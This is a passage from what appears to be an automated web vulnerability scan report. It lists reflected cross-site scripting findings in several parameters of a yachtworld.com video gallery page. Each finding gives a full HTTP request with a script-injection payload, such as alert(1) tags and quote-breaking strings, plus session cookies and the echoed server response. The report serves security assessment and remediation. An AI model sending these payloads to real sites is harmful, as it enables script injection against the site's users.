6_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:29:47 GMT
Server: Apache
Cache-Control: private
Content-Length: 5850
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine/boats.footer.html
...[SNIP]...
</h1>
Photo 118db0<script>alert(1)</script>a6499d1e16
<p align="center">
...[SNIP]...

3.483. http://www.yachtworld.com/core/listing/video_gallery.jsp [&ybw parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/video_gallery.jsp

Issue detail

The value of the &ybw request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 2f837><script>alert(1)</script>eb0413a11fc was submitted in the &ybw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/video_gallery.jsp?boat_id=2265386&hosturl=clarkslanding&&ywo=clarkslanding&&ybw=2f837><script>alert(1)</script>eb0413a11fc HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 22:42:09 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/clarkslanding/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages
...[SNIP]...
<a href=/core/listing/pl_boat_detail.jsp?boat_id=2265386&checked_boats=2265386&hosturl=clarkslanding&&ywo=clarkslanding&&ybw=2f837><script>alert(1)</script>eb0413a11fc&units=Feet&access=Public&listing_id=13824&url=>
...[SNIP]...

3.484. http://www.yachtworld.com/core/listing/video_gallery.jsp [&ywo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/video_gallery.jsp

Issue detail

The value of the &ywo request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 6b880><script>alert(1)</script>6cd97de7497 was submitted in the &ywo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/video_gallery.jsp?boat_id=2265386&hosturl=clarkslanding&&ywo=clarkslanding6b880><script>alert(1)</script>6cd97de7497&&ybw= HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 22:42:05 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/clarkslanding/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages
...[SNIP]...
<a href=/core/listing/pl_boat_detail.jsp?boat_id=2265386&checked_boats=2265386&hosturl=clarkslanding&&ywo=clarkslanding6b880><script>alert(1)</script>6cd97de7497&&ybw=&units=Feet&access=Public&listing_id=13824&url=>
...[SNIP]...

3.485. http://www.yachtworld.com/core/listing/video_gallery.jsp [boat_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/video_gallery.jsp

Issue detail

The value of the boat_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93bf2'%3balert(1)//a87da5c982d was submitted in the boat_id parameter. This input was echoed as 93bf2';alert(1)//a87da5c982d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/video_gallery.jsp?boat_id=226538693bf2'%3balert(1)//a87da5c982d&hosturl=clarkslanding&&ywo=clarkslanding&&ybw= HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 22:41:43 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "226538693bf2';alert(1)//a87da5c982d"<br>
...[SNIP]...

3.486. http://www.yachtworld.com/core/listing/video_gallery.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/video_gallery.jsp

Issue detail

The value of the hosturl request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload c1bb3><script>alert(1)</script>62e89979c99 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/video_gallery.jsp?boat_id=2265386&hosturl=clarkslandingc1bb3><script>alert(1)</script>62e89979c99&&ywo=clarkslanding&&ybw= HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 22:41:53 GMT
Server: Apache
Cache-Control: private
Content-Length: 2594
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/clarkslandingc1bb3><script>alert(1)</script>62e89979c99/boats.header.html:/opt/weblogi
...[SNIP]...
<a href=/core/listing/pl_boat_detail.jsp?boat_id=2265386&checked_boats=2265386&hosturl=clarkslandingc1bb3><script>alert(1)</script>62e89979c99&&ywo=clarkslanding&&ybw=&units=Feet&access=Public&listing_id=13824&url=>
...[SNIP]...

3.487. http://www.yachtworld.com/core/listing/video_gallery.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/video_gallery.jsp

Issue detail

The value of the hosturl request parameter is copied into an HTML comment. The payload 73aa4--><script>alert(1)</script>9a0952813dc was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /core/listing/video_gallery.jsp?boat_id=2265386&hosturl=clarkslanding73aa4--><script>alert(1)</script>9a0952813dc&&ywo=clarkslanding&&ybw= HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 